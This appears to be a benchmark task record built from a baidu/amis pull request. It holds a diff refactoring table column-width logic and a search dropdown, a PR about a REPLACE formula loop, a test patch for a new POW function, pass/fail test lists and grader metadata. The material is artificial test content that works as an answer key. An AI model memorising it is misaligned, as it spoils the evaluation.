{ + if (record && itemActions) { let target = event.target; if (target?.tagName !== 'TR') { target = target?.closest('tr'); @@ -1153,30 +1182,16 @@ export class Table extends React.PureComponent<TableProps, TableState> { record?: any, rowIndex?: number ) { - const {classnames: cx, onRow} = this.props; + const {onRow} = this.props; - if (onRow && onRow.onRowMouseLeave) { - const prevented = await onRow.onRowMouseLeave(event, record, rowIndex); - if (prevented) { - return; - } - } - - let parent = event.target; - while (parent && parent.tagName !== 'TR') { - parent = parent.parentElement; - } - - if (parent) { - for (let i = 0; i < parent.children.length; i++) { - const td = parent.children[i]; - td.classList.remove(cx('Table-cell-row-hover')); - } - } + onRow && + onRow.onRowMouseLeave && + onRow.onRowMouseLeave(event, record, rowIndex); } onMouseLeave() { - this.setState({hoverRow: null}); + const {itemActions} = this.props; + itemActions && this.setState({hoverRow: null}); } onExpandRows(data: Array<any>) { @@ -1384,7 +1399,7 @@ export class Table extends React.PureComponent<TableProps, TableState> { // 但直接使用amis-ui的table,render方法一般直接返回ReactElement const render = item.render && typeof item.render === 'function' - ? item.render(data[item.name], data, rowIndex, i) + ? item.render(data[item.name], data, rowIndex, i, levels) : null; let props = {rowSpan: 1, colSpan: 1}; let children = render; @@ -1413,6 +1428,7 @@ export class Table extends React.PureComponent<TableProps, TableState> { className={cx({ [`${className}`]: !!className })} + col={i > -1 ? i.toString() : undefined} > <div className={cx('Table-cell-wrapper', { @@ -1793,16 +1809,18 @@ export class Table extends React.PureComponent<TableProps, TableState> { const { scroll, footSummary, - loading, showHeader, itemActions, + tableLayout, classnames: cx } = this.props; const hasScrollX = scroll && scroll.x; const hoverRow = this.state.hoverRow; - const tableStyle = hasScrollX ? {width: scroll.x + 'px'} : {}; + const tableStyle = hasScrollX + ? {width: scroll.x + 'px', tableLayout: 'fixed'} + : {}; return ( <div @@ -1820,13 +1838,16 @@ export class Table extends React.PureComponent<TableProps, TableState> { </ItemActionsWrapper> ) : null} <table - style={{...tableStyle, tableLayout: 'fixed'}} + style={{ + ...tableStyle, + tableLayout: tableLayout === 'fixed' ? 'fixed' : 'auto' + }} className={cx('Table-table')} > {this.renderColGroup()} {showHeader ? this.renderTHead() : null} {this.renderTBody()} - {!loading && footSummary ? this.renderTFoot() : null} + {footSummary ? this.renderTFoot() : null} </table> </div> ); @@ -1865,7 +1886,7 @@ export class Table extends React.PureComponent<TableProps, TableState> { className={cx('Table-table')} style={{...tableStyle, tableLayout: 'fixed'}} > - {this.renderColGroup()} + {this.renderColGroup(true)} {showHeader ? this.renderTHead() : null} {headSummary ? ( <tbody>{this.renderSummaryRow(headSummary)}</tbody> @@ -1939,45 +1960,109 @@ export class Table extends React.PureComponent<TableProps, TableState> { } renderScrollTable() { - const {footSummary, loading, classnames: cx} = this.props; + const {footSummary, classnames: cx} = this.props; return ( <div className={cx('Table-container')}> {this.renderScrollTableHeader()} {this.renderScrollTableBody()} - {!loading && footSummary ? this.renderScrollTableFoot() : null} + {footSummary ? this.renderScrollTableFoot() : null} </div> ); } @autobind syncTableWidth() { + const tbodyDom = this.tbodyDom.current; + if (!tbodyDom) { + return; + } + const cols = [].slice.call( + tbodyDom?.querySelectorAll(':scope>tr>td[data-col]') + ); + const colWidths: any = {}; + cols.forEach((col: HTMLElement) => { + const index = parseInt(col.getAttribute('data-col')!, 10); + const column = this.tdColumns[index]; + const item = this.state.colWidths[column.name]; + if (column) { + colWidths[column.name] = { + width: + item?.originWidth !== column?.width ? column?.width : item?.width, + minWidth: column?.minWidth, + realWidth: col.offsetWidth, + originWidth: column?.width + }; + } + }); + + if (!isEqual(colWidths, this.state.colWidths)) { + this.setState({colWidths}); + } + } + + @autobind + initTableWidth() { const tableWrapperDom = this.contentDom.current; if (!tableWrapperDom) { return; } + const {scroll, tableLayout} = this.props; const table = tableWrapperDom.querySelector('table'); - const tableWidth = tableWrapperDom!.offsetWidth; + const tableWidth = + scroll && scroll.x ? scroll.x : tableWrapperDom!.offsetWidth; const thead = this.theadDom?.current; - const tbodyTr = this.tbodyDom?.current?.querySelector('tr:first-child'); + let tbody: HTMLElement | null = null; + const htmls: Array<string> = []; + const isFixed = tableLayout === 'fixed' || (scroll && scroll.x); + const someSettedWidth = this.tdColumns.some(column => column.width); + + const minWidths: { + [propName: string]: number; + } = {}; + + // fixed 模式需要参考 auto 获得列最小宽度 + if (isFixed) { + tbody = table?.querySelector(':scope>tbody') || null; + htmls.push( + `<table style="table-layout:auto!important;width:0!important;min-width:0!important;" class="${table?.className}">${thead?.outerHTML}</table>` + ); + } + + if (someSettedWidth || isFixed) { + htmls.push( + `<table style="table-layout:auto!important;min-width:${tableWidth}px!important;width:${tableWidth}px!important;" class="${ + table?.className + }">${thead ? thead.outerHTML : ''}${ + tbody ? `<tbody>${tbody.innerHTML}</tbody>` : '' + }</table>` + ); + } + + if (!htmls.length) { + return; + } const div = document.createElement('div'); div.className = 'amis-scope'; // jssdk 里面 css 会在这一层 div.style.cssText += `visibility: hidden!important;`; - div.innerHTML = - `<table style="table-layout:auto!important;width:0!important;min-width:0!important;" class="${table?.className}">${thead?.outerHTML}</table>` + - `<table style="table-layout:auto!important;min-width:${tableWidth}px!important;width:${tableWidth}px!important;" class="${ - table?.className - }">${thead?.outerHTML}${ - tbodyTr ? `<tbody>${tbodyTr.outerHTML}</tbody>` : '' - }</table>`; - const ths1: Array<HTMLTableCellElement> = [].slice.call( - div.querySelectorAll(':scope>table:first-child>thead>tr>th[data-col]') - ); - const ths2: Array<HTMLTableCellElement> = [].slice.call( - div.querySelectorAll(':scope>table:last-child>thead>tr>th[data-col]') - ); + div.innerHTML = htmls.join(''); + let ths1: Array<HTMLTableCellElement> = []; + let ths2: Array<HTMLTableCellElement> = []; + + if (isFixed) { + ths1 = [].slice.call( + div.querySelectorAll(':scope>table:first-child>thead>tr>th[data-col]') + ); + } + + if (someSettedWidth || isFixed) { + ths2 = [].slice.call( + div.querySelectorAll(':scope>table:last-child>thead>tr>th[data-col]') + ); + } + ths1.forEach(th => { th.style.cssText += 'width: 0'; }); @@ -1994,39 +2079,52 @@ export class Table extends React.PureComponent<TableProps, TableState> { }); document.body.appendChild(div); - const minWidths: { - [propName: string]: number; - } = {}; + + const colWidths: any = {}; ths1.forEach((th: HTMLTableCellElement) => { - minWidths[th.getAttribute('data-index')!] = th.clientWidth; + const index = parseInt(th.getAttribute('data-col')!, 10); + const column = this.tdColumns[index]; + minWidths[index] = th.clientWidth; + if (colWidths[index]) { + colWidths[column?.name].minWidth = th.clientWidth; + } else { + colWidths[column?.name] = {minWidth: th.clientWidth}; + } }); - const colWidths: Array<number> = []; - ths2.forEach((col: HTMLElement, index: number) => { + + ths2.forEach((col: HTMLElement) => { + const index = parseInt(col.getAttribute('data-col')!, 10); const column = this.tdColumns[index]; - colWidths.push( - Math.max( - typeof column?.width === 'number' ? column?.width : col.clientWidth, - minWidths[col.getAttribute('data-index')!] - ) - ); + if (column && (column.width || isFixed)) { + const width = Math.max( + typeof column.width === 'number' ? column.width : col.clientWidth, + minWidths[index] || 0 + ); + if (colWidths[column?.name]) { + colWidths[column?.name].width = width; + } else { + colWidths[column?.name] = {width}; + } + if (column.width) { + colWidths[column?.name].originWidth = column.width; + } + } }); - this.setState({colWidths}); + if (!isEqual(colWidths, this.state.colWidths)) { + this.setState({colWidths}); + } document.body.removeChild(div); } @autobind - updateTableInfoRef(ref: any) { - if (!ref) { - return; - } - + updateTableInfo() { if (this.resizeTarget) { return; } - this.syncTableWidth(); + this.initTableWidth(); } render() { @@ -2062,8 +2160,6 @@ export class Table extends React.PureComponent<TableProps, TableState> { // 是否设置了横向滚动 const hasScrollX = scroll && scroll.x; - const columnWidthReady = this.state.colWidths.length > 0; - return ( <div ref={this.tableDom} @@ -2091,7 +2187,6 @@ export class Table extends React.PureComponent<TableProps, TableState> { {typeof footer === 'function' ? footer() : footer} </div> ) : null} - {columnWidthReady ? null : <span ref={this.updateTableInfoRef} />} </div> ); } diff --git a/packages/amis/src/renderers/Json.tsx b/packages/amis/src/renderers/Json.tsx index 87b3735f6..31bdee6fc 100644 --- a/packages/amis/src/renderers/Json.tsx +++ b/packages/amis/src/renderers/Json.tsx @@ -4,9 +4,15 @@ import {Renderer, RendererProps} from 'amis-core'; import type {InteractionProps} from 'react-json-view'; import {autobind, getPropValue, noop} from 'amis-core'; import {BaseSchema} from '../Schema'; -import {resolveVariableAndFilter, isPureVariable} from 'amis-core'; - -export const JsonView = React.lazy(() => import('react-json-view')); +import { + resolveVariableAndFilter, + isPureVariable, + importLazyComponent +} from 'amis-core'; + +export const JsonView = React.lazy(() => + import('react-json-view').then(importLazyComponent) +); /** * JSON 数据展示控件。 * 文档:https://aisuda.bce.baidu.com/amis/zh-CN/components/json diff --git a/packages/amis/src/renderers/Table/HeadCellSearchDropdown.tsx b/packages/amis/src/renderers/Table/HeadCellSearchDropdown.tsx index 8553ae3c3..258f07b2d 100644 --- a/packages/amis/src/renderers/Table/HeadCellSearchDropdown.tsx +++ b/packages/amis/src/renderers/Table/HeadCellSearchDropdown.tsx @@ -3,9 +3,7 @@ import {RendererProps} from 'amis-core'; import {ActionObject} from 'amis-core'; import {Icon} from 'amis-ui'; import {Overlay} from 'amis-core'; -import {findDOMNode} from 'react-dom'; import {PopOver} from 'amis-core'; -import {ITableStore} from 'amis-core'; import {setVariable, createObject} from 'amis-core'; export interface QuickSearchConfig { @@ -23,35 +21,31 @@ export interface HeadCellSearchProps extends RendererProps { onQuery: (values: object) => void; } -export class HeadCellSearchDropDown extends React.Component< - HeadCellSearchProps, - any -> { - state = { - isOpened: false - }; - - formItems: Array<string> = []; - constructor(props: HeadCellSearchProps) { - super(props); - - this.open = this.open.bind(this); - this.close = this.close.bind(this); - this.handleSubmit = this.handleSubmit.bind(this); - this.handleAction = this.handleAction.bind(this); - } - - buildSchema() { - const {searchable, sortable, name, label, translate: __} = this.props; - +export function HeadCellSearchDropDown({ + searchable, + name, + label, + onQuery, + data, + dispatchEvent, + onAction, + classnames: cx, + translate: __, + classPrefix: ns, + popOverContainer, + render +}: HeadCellSearchProps) { + const ref = React.createRef<HTMLElement>(); + const [formSchema, formItems] = React.useMemo(() => { let schema: any; + const formItems: Array<string> = []; if (searchable === true) { schema = { title: '', - controls: [ + body: [ { - type: 'text', + type: 'input-text', name, placeholder: label, clearable: true @@ -59,21 +53,22 @@ export class HeadCellSearchDropDown extends React.Component< ] }; } else if (searchable) { - if (searchable.controls || searchable.tabs || searchable.fieldSet) { + if (searchable.body || searchable.tabs || searchable.fieldSet) { + // todo 删除此处代码,这些都是不推荐的用法 schema = { title: '', ...searchable, - controls: Array.isArray(searchable.controls) - ? searchable.controls.concat() + body: Array.isArray(searchable.body) + ? searchable.body.concat() : undefined }; } else { schema = { title: '', className: searchable.formClassName, - controls: [ + body: [ { - type: searchable.type || 'text', + type: searchable.type || 'input-text', name: searchable.name || name, placeholder: label, ...searchable @@ -83,41 +78,11 @@ export class HeadCellSearchDropDown extends React.Component< } } - if (schema && schema.controls && sortable) { - schema.controls.unshift( - { - type: 'hidden', - name: 'orderBy', - value: name - }, - { - type: 'button-group', - name: 'orderDir', - label: __('sort'), - options: [ - { - label: __('asc'), - value: 'asc' - }, - { - label: __('desc'), - value: 'desc' - } - ] - } - ); - } - if (schema) { - const formItems: Array<string> = []; - schema.controls?.forEach( - (item: any) => - item.name && - item.name !== 'orderBy' && - item.name !== 'orderDir' && - formItems.push(item.name) - ); - this.formItems = formItems; + Array.isArray(schema.body) && + schema.body.forEach( + (item: any) => item.name && formItems.push(item.name) + ); schema = { ...schema, type: 'form', @@ -144,64 +109,13 @@ export class HeadCellSearchDropDown extends React.Component< }; } - return schema || 'error'; - } - - handleClickOutside() { - this.close(); - } - - open() { - this.setState({ - isOpened: true - }); - } - - close() { - this.setState({ - isOpened: false - }); - } - - handleAction(e: any, action: ActionObject, ctx: object) { - const {onAction} = this.props; - - if (action.actionType === 'cancel' || action.actionType === 'close') { - this.close(); - return; - } - - if (action.actionType === 'reset') { - this.close(); - this.handleReset(); - return; - } - - onAction && onAction(e, action, ctx); - } - - handleReset() { - const {onQuery, data, name} = this.props; - const values = {...data}; - this.formItems.forEach(key => setVariable(values, key, undefined)); - - if (values.orderBy === name) { - values.orderBy = ''; - values.orderDir = 'asc'; - } - onQuery(values); - } - - async handleSubmit(values: any) { - const {onQuery, name, data, dispatchEvent} = this.props; - - if (values.orderDir) { - values = { - ...values, - orderBy: name - }; - } + return [schema || 'error', formItems]; + }, [searchable, name, label]); + const [isOpened, setIsOpened] = React.useState(false); + const open = React.useCallback(() => setIsOpened(true), []); + const close = React.useCallback(() => setIsOpened(false), []); + const handleSubmit = React.useCallback(async (values: any) => { const rendererEvent = await dispatchEvent( 'columnSearch', createObject(data, { @@ -214,78 +128,81 @@ export class HeadCellSearchDropDown extends React.Component< return; } - this.close(); - + close(); onQuery(values); - } + }, []); - isActive() { - const {data, name, orderBy} = this.props; + const handleAction = React.useCallback( + (e: any, action: ActionObject, ctx: object) => { + if (action.actionType === 'cancel' || action.actionType === 'close') { + close(); + return; + } - return orderBy === name || this.formItems.some(key => data?.[key]); - } + if (action.actionType === 'reset') { + close(); + handleReset(); + return; + } - render() { - const { - render, - name, - data, - searchable, - store, - orderBy, - popOverContainer, - classPrefix: ns, - classnames: cx - } = this.props; + onAction && onAction(e, action, ctx); + }, + [] + ); - const formSchema = this.buildSchema(); - const isActive = this.isActive(); + const handleReset = React.useCallback(() => { + const values = {...data}; + // todo 这里不精准,如果表单项有容器嵌套,这里将不正确 + formItems.forEach(key => setVariable(values, key, undefined)); - return ( - <span - className={cx( - `${ns}TableCell-searchBtn`, - isActive ? 'is-active' : '', - this.state.isOpened ? 'is-opened' : '' - )} - > - <span onClick={this.open}> - <Icon icon="search" className="icon" /> - </span> - {this.state.isOpened ? ( - <Overlay - container={popOverContainer || (() => findDOMNode(this))} - placement="left-bottom-left-top right-bottom-right-top" - target={ - popOverContainer ? () => findDOMNode(this)!.parentNode : null - } - show - > - <PopOver - classPrefix={ns} - onHide={this.close} - className={cx( - `${ns}TableCell-searchPopOver`, - (searchable as any).className - )} - overlay - > - { - render('quick-search-form', formSchema, { - data: { - ...data, - orderBy: orderBy, - orderDir: - orderBy === name ? (store as ITableStore).orderDir : '' - }, - onSubmit: this.handleSubmit, - onAction: this.handleAction - }) as JSX.Element - } - </PopOver> - </Overlay> - ) : null} + onQuery(values); + }, [data]); + + const isActive = React.useMemo(() => { + // todo 这里不精准,如果表单项有容器嵌套,这里将不正确 + return formItems.some(key => data?.[key]); + }, [data]); + + return ( + <span + ref={ref} + className={cx( + `${ns}TableCell-searchBtn`, + isActive ? 'is-active' : '', + isOpened ? 'is-opened' : '' + )} + > + <span onClick={open}> + <Icon icon="search" className="icon" /> </span> - ); - } + {isOpened ? ( + <Overlay + container={popOverContainer || (() => ref.current)} + placement="left-bottom-left-top right-bottom-right-top" + target={popOverContainer ? () => ref.current?.parentNode : null} + show + > + <PopOver + classPrefix={ns} + onHide={close} + className={cx( + `${ns}TableCell-searchPopOver`, + (searchable as any).className + )} + overlay + > + { + render('quick-search-form', formSchema, { + data: { + ...data + }, + onSubmit: handleSubmit, + onAction: handleAction + }) as JSX.Element + } + </PopOver> + </Overlay> + ) : null} + </span> + ); } diff --git a/packages/amis/src/renderers/Table/index.tsx b/packages/amis/src/renderers/Table/index.tsx index 62ddc298b..f07dcc238 100644 --- a/packages/amis/src/renderers/Table/index.tsx +++ b/packages/amis/src/renderers/Table/index.tsx @@ -1860,11 +1860,8 @@ export default class Table extends React.Component<TableProps, object> { onQuery={onQuery} name={column.name} searchable={column.searchable} - sortable={false} type={column.type} data={query} - orderBy={store.orderBy} - orderDir={store.orderDir} popOverContainer={this.getPopOverContainer} /> ); diff --git a/packages/amis/src/renderers/Table2/index.tsx b/packages/amis/src/renderers/Table2/index.tsx index 52dbe38d4..693131efa 100644 --- a/packages/amis/src/renderers/Table2/index.tsx +++ b/packages/amis/src/renderers/Table2/index.tsx @@ -152,6 +152,8 @@ export interface ColumnSchema { * 配置快速编辑功能 */ quickEdit?: SchemaQuickEdit; + + width?: string | number; } export interface RowSelectionOptionsSchema { @@ -385,6 +387,8 @@ export interface TableSchema2 extends BaseSchema { * 设置ID字段名 作用同keyFiled 兼容原CURD属性 */ primaryField?: string; + + tableLayout?: 'fixed' | 'auto'; } // 事件调整 对应CRUD2里的事件配置也需要同步修改 @@ -492,7 +496,7 @@ export default class Table2 extends React.Component<Table2Props, object> { store.update({ columnsTogglable, columns, - rowSelectionKeyField: rowSelection?.keyField || primaryField || keyField + rowSelectionKeyField: primaryField || rowSelection?.keyField || keyField }); Table2.syncRows(store, props, undefined) && this.syncSelected(); } @@ -579,7 +583,7 @@ export default class Table2 extends React.Component<Table2Props, object> { let expandedRowKeys: Array<string | number> = []; const expandableKeyField = - props.expandable?.keyField || props.primaryField || props.keyField; + props.primaryField || props.expandable?.keyField || props.keyField; if (props.expandable && props.expandable.expandedRowKeysExpr) { rows.forEach((row: any, index: number) => { const flag = evalExpression( @@ -651,7 +655,7 @@ export default class Table2 extends React.Component<Table2Props, object> { ) { store.update({ rowSelectionKeyField: - props.rowSelection?.keyField || props.primaryField || props.keyField + props.primaryField || props.rowSelection?.keyField || props.keyField }); } @@ -818,13 +822,16 @@ export default class Table2 extends React.Component<Table2Props, object> { text: string, record: any, rowIndex: number, - colIndex: number + colIndex: number, + levels?: Array<number> ) => { const props: RenderProps = {}; - const item = store.getRowByIndex(rowIndex) || {}; + const item = + store.getRowByIndex(rowIndex, [...(levels || [])]) || {}; + const obj = { children: this.renderCellSchema(column, { - data: item.locals, + data: record, value: column.name ? resolveVariable( column.name, @@ -1380,7 +1387,7 @@ export default class Table2 extends React.Component<Table2Props, object> { async handleOrderChange( oldIndex: number, newIndex: number, - levels: Array<string> + levels: Array<number> ) { const {store} = this.props; const rowItem = store.getRowByIndex(oldIndex, levels); @@ -1441,7 +1448,7 @@ export default class Table2 extends React.Component<Table2Props, object> { store.updateSelected(selected); break; case 'expand': - const expandableKey = expandable?.keyField || primaryField || key; + const expandableKey = primaryField || expandable?.keyField || key; const expanded: Array<any> = []; const collapse: Array<any> = []; // value值控制展开1个 @@ -1535,7 +1542,16 @@ export default class Table2 extends React.Component<Table2Props, object> { if (expandable && expandable.type) { expandableConfig.expandedRowRender = (record: any, rowIndex: number) => - this.renderSchema('expandableBody', {...expandable}, {data: record}); + this.renderSchema( + 'expandableBody', + {...expandable}, + { + data: { + ...this.props.data, + record + } + } + ); } if (expandable.expandedRowClassNameExpr) { @@ -1548,7 +1564,13 @@ export default class Table2 extends React.Component<Table2Props, object> { } let rowSelectionConfig: any = null; - if (rowSelection) { + if (selectable) { + rowSelectionConfig = { + type: multiple === false ? 'radio' : '', // rowSelection.type不设置 默认为多选 + selectedRowKeys: store.currentSelectedRowKeys, + maxSelectedLength: maxKeepItemSelectionLength + }; + } else if (rowSelection) { const {selectedRowKeys, selections, ...rest} = rowSelection; rowSelectionConfig = { selectedRowKeys: store.currentSelectedRowKeys, @@ -1612,12 +1634,6 @@ export default class Table2 extends React.Component<Table2Props, object> { }); }); } - } else if (selectable) { - rowSelectionConfig = { - type: multiple === false ? 'radio' : '', // rowSelection.type不设置 默认为多选 - selectedRowKeys: store.currentSelectedRowKeys, - maxSelectedLength: maxKeepItemSelectionLength - }; } const rowClassName = (record: any, rowIndex: number) => {
fix: 修复 REPLACE 公式第二个参数是空字符串时导致的死循环问题 Close: #8200 ### What <!-- copilot:summary --> ### <samp>🤖 Generated by Copilot at f5208ec</samp> This pull request enhances the text manipulation capabilities of `evalutor.ts` by adding or improving functions that normalize, format, and compare text values. It also ensures that the arguments are properly validated and handled by using `normalizeText` and `formatNumber`. <!-- copilot:poem --> ### <samp>🤖 Generated by Copilot at f5208ec</samp> > _We are the evaluators of the text_ > _We normalize and format with no regrets_ > _We manipulate the strings with skill and power_ > _We defy the errors that would make us cower_ ### Why Close: #8200 ### How <!-- copilot:walkthrough --> ### <samp>🤖 Generated by Copilot at f5208ec</samp> * Normalize text, search, and replace arguments for string functions using `normalizeText` method ([link](https://github.com/baidu/amis/pull/8365/files?diff=unified&w=0#diff-6e98a1dfcecf7c45fc01fdf27b5c21e037dc90466a0761a63998e1736958b433R1218), [link](https://github.com/baidu/amis/pull/8365/files?diff=unified&w=0#diff-6e98a1dfcecf7c45fc01fdf27b5c21e037dc90466a0761a63998e1736958b433R1302), [link](https://github.com/baidu/amis/pull/8365/files?diff=unified&w=0#diff-6e98a1dfcecf7c45fc01fdf27b5c21e037dc90466a0761a63998e1736958b433R1322), [link](https://github.com/baidu/amis/pull/8365/files?diff=unified&w=0#diff-6e98a1dfcecf7c45fc01fdf27b5c21e037dc90466a0761a63998e1736958b433R1342), [link](https://github.com/baidu/amis/pull/8365/files?diff=unified&w=0#diff-6e98a1dfcecf7c45fc01fdf27b5c21e037dc90466a0761a63998e1736958b433L1360-R1371), [link](https://github.com/baidu/amis/pull/8365/files?diff=unified&w=0#diff-6e98a1dfcecf7c45fc01fdf27b5c21e037dc90466a0761a63998e1736958b433L1390-R1405)) in `packages/amis-formula/src/evalutor.ts`
**Title** Fix REPLACE formula infinite loop, add POW function and stabilize table rendering **Problem** - The `REPLACE` formula entered an endless loop when the search string was empty, breaking formula evaluation. - Several text functions (e.g., `STARTSWITH`, `ENDSWITH`, `CONTAINS`, `SEARCH`, `MID`) did not correctly handle empty or undefined arguments, leading to incorrect results. - Table components exhibited incorrect column‑width calculations, layout glitches with fixed/auto table layouts, and improper hover styles. **Root Cause** - `REPLACE` repeatedly searched for an empty substring, never advancing the index. - Text functions operated on raw inputs without normalization, so empty delimiters caused unexpected behavior. - Table width logic assumed all columns had explicit widths and applied hover classes to every cell, ignoring fixed‑column nuances; lazy loading of `react‑json‑view` relied on a default export that was not always present. **Fix / Expected Behavior** - `REPLACE` now returns the original text when the search string is empty or the replace value is undefined, preventing loops. - All string functions now normalize and validate their parameters, safely handling empty delimiters and non‑numeric inputs. - Introduce a new `POW` function that computes exponentiation only for valid numeric arguments, returning the base or `NaN` as appropriate. - Refactor table column‑width handling to compute widths based on actual rendered cells, support both fixed and auto layouts, and preserve user‑specified widths. - Replace direct import of `react‑json‑view` with a safe lazy‑import helper to work with both default and named exports. - Adjust hover handling so only relevant cells receive hover styles, eliminating unwanted style propagation. - Ensure store updates merge query data correctly without overwriting existing query parameters. **Risk & Validation** - Verify formula evaluation across edge cases (empty strings, non‑numeric arguments) and confirm `POW` behaves per specification. - Test table rendering with various column configurations (fixed, auto, mixed widths) and scrolling scenarios to ensure layout stability. - Run UI tests for CRUD, Table2, and Form components to confirm lazy‑loaded JSON view functions and hover styles work correctly. - Perform regression testing on existing document examples and API interactions to ensure no side‑effects.
8,365
baidu/amis
diff --git a/packages/amis-formula/__tests__/evalute.test.ts b/packages/amis-formula/__tests__/evalute.test.ts index 4670b3906..2fb97d99a 100644 --- a/packages/amis-formula/__tests__/evalute.test.ts +++ b/packages/amis-formula/__tests__/evalute.test.ts @@ -539,3 +539,26 @@ test('evalute:ISTYPE', () => { expect(evaluate('${ISTYPE(f, "plain-object")}', data)).toBe(true); expect(evaluate('${ISTYPE(g, "date")}', data)).toBe(true); }); + +test('evalute:Math', () => { + const data = { + float: 0.5, + integer1: 2, + integer2: 4, + negativeInteger: -2, + array: [1, 2 ,3], + infinity: Infinity + } + + expect(evaluate('${POW(integer1, integer2)}', data)).toBe(16); + expect(evaluate('${POW(integer2, 0.5)}', data)).toBe(2); + expect(evaluate('${POW(integer1, -2)}', data)).toBe(0.25); + /** 计算结果不合法,则返回NaN */ + expect(evaluate('${POW(negativeInteger, 0.5)}', data)).toBe(NaN); + /** 参数值不合法,则返回基数本身*/ + expect(evaluate('${POW(array, 2)}', data)).toBe(data.array); + /** 测试Infinity */ + expect(evaluate('${POW(infinity, 2)}', data)).toBe(data.infinity); + expect(evaluate('${POW(1, infinity)}', data)).toBe(NaN); + expect(evaluate('${POW(2, infinity)}', data)).toBe(data.infinity); +})
[ "evalute:Math" ]
[ "lexer:simple", "lexer:filter", "lexer:exception", "parser:simple", "parser:complex", "parser:evalMode", "parser:template", "parser:string", "parser:number", "parser:single-string", "parser:object-literall", "parser:array-literall", "parser:variable-geter", "parser:variable-geter2", "parser:multi-expression", "parser:functionCall", "parser:filter", "parser:filter-escape", "parser:conditional", "parser:binary-expression", "parser:group-expression", "parser:unary-expression", "parser:anonymous-function", "evalute:simple", "evalute:filter", "evalute:filter2", "evalute:filter3", "evalute:filter4", "evalute:keywords", "evalute:oldVariable", "evalute:ariable2", "evalute:ariable3", "evalute:object-variable", "evalute:literal-variable", "evalute:tempalte", "evalute:literal", "evalute:variableName", "evalute:3-1", "evalate:0.1+0.2", "evalute:variable:com.xxx.xx", "evalute:anonymous:function", "evalute:anonymous:function2", "evalute:array:func", "evalute:ISTYPE", "formula:expression", "formula:expression2", "formula:expression3", "formula:if", "formula:and", "formula:or", "formula:xor", "formula:ifs", "formula:math", "formula:text", "formula:date", "formula:last", "formula:basename", "formula:customFunction" ]
Method: Evaluator.fnPOW(self, base: number, exponent: number) Location: packages/amis-formula/src/evalutor.ts (class Evaluator) Inputs: - **base** <number>: the base value to be raised. Must be a numeric value; otherwise the function returns the base unchanged. - **exponent** <number>: the exponent to raise the base to. Must be a numeric value; otherwise the function returns the base unchanged. Outputs: <number> – the result of Math.pow(base, exponent). If either argument is not a number the function returns base; if the calculation yields an invalid number (e.g., negative base with a non‑integer exponent) the result is NaN. Description: Computes the power of a base raised to an exponent for use in AMIS formula expressions. Called via the “POW” formula token (e.g., ${POW(a, b)}). Use it when a mathematical exponentiation is required; it safely handles non‑numeric arguments by falling back to the base value.
custom-check-github
{ "base_image_name": "node_16", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "cd packages/amis-formula && npx jest --verbose --no-color" }
{ "num_modified_files": 22, "num_modified_lines": 609, "pr_author": "2betop", "pr_labels": [ "fix" ], "llm_metadata": { "code": "B4", "code_quality": null, "confidence": 0.92, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": true, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [ "https://github.com/baidu/amis/pull/8365/files?diff=unified&w=0#diff-6e98a1dfcecf7c45fc01fdf27b5c21e037dc90466a0761a63998e1736958b433R1218", "https://github.com/baidu/amis/pull/8365/files?diff=unified&w=0#diff-6e98a1dfcecf7c45fc01fdf27b5c21e037dc90466a0761a63998e1736958b433R1302", "https://github.com/baidu/amis/pull/8365/files?diff=unified&w=0#diff-6e98a1dfcecf7c45fc01fdf27b5c21e037dc90466a0761a63998e1736958b433R1322", "https://github.com/baidu/amis/pull/8365/files?diff=unified&w=0#diff-6e98a1dfcecf7c45fc01fdf27b5c21e037dc90466a0761a63998e1736958b433R1342", "https://github.com/baidu/amis/pull/8365/files?diff=unified&w=0#diff-6e98a1dfcecf7c45fc01fdf27b5c21e037dc90466a0761a63998e1736958b433L1360-R1371", "https://github.com/baidu/amis/pull/8365/files?diff=unified&w=0#diff-6e98a1dfcecf7c45fc01fdf27b5c21e037dc90466a0761a63998e1736958b433L1390-R1405" ], "intent_completeness": "insufficient", "patch": null, "pr_categories": [ "minor_bug" ], "reason": null, "reasoning": "The issue text asks for fixing an infinite loop in the REPLACE formula when the second argument is an empty string, but the provided test patch adds tests for a new POW function that is not mentioned in the issue. The tests therefore do not verify the stated REPLACE fix and instead require implementing POW, which is missing from the specification. This mismatch indicates an ambiguous specification (B4) rather than a clean, solvable problem.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [ "Tests exercise a new POW function that is not described in the issue", "No test for REPLACE behavior mentioned in the issue" ], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
79728ddad4ddfdad819d4ea6e152790ba2aa410e
2023-10-12 08:54:51
baidu__amis-8370
